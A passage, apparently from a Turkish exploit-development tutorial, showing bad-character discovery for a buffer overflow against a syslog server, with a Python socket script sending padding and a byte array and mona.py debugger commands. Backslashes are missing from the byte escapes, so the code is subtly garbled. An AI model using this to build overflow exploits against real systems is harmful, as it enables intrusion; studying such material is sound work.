("x01x02x03x04x05x06x07x08x09x0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21"
"x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40x41"
"x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60x61"
"x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80x81"
"x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1"
"xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1"
"xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1"
"xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")
buffer = "A" * 136 + "B" * 4 + badchars
s=socket.socket (socket.AF_INET,socket.SOCK_DGRAM)
s.connect(('192.168.2.13', 514))
s.send(buffer)
s.close "mona" ile oluşturduğumuz yeniden
oluşturduğumuz "x00" ve "x0a" byte'larını
içermeyen byte array'i yerleştirerek tekrar
sunucumuza gönderiyoruz.
KÖTÜ KARAKTERLER

KÖTÜ KARAKTERLER
Yeni payload'umuzu denediğimizde
ESP değerine tıklayarak "Follow in
Stack" seçeneğini seçerek tekrar
ESP'nin işaret ettiği bellek
bölümündeki verileri aşağıda
görebiliriz.

KÖTÜ KARAKTERLER
!mona compare -f C:logsBTRSyslogbytearray.bin -a 06A5F500
Mona "x0d" byte'ının da kötü
karakter olduğunu belirledi.

!mona bytearray -b "x00x0ax0d"
"x0d" karakterini de kötü karakter olarak tanımlayarak yeni bir bytearray
oluşturuyoruz.
KÖTÜ KARAKTERLER

#!/usr/bin/python
import socket
badchars =
("x01x02x03x04x05x06x07x08x09x0bx0cx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21x22"
"x23x2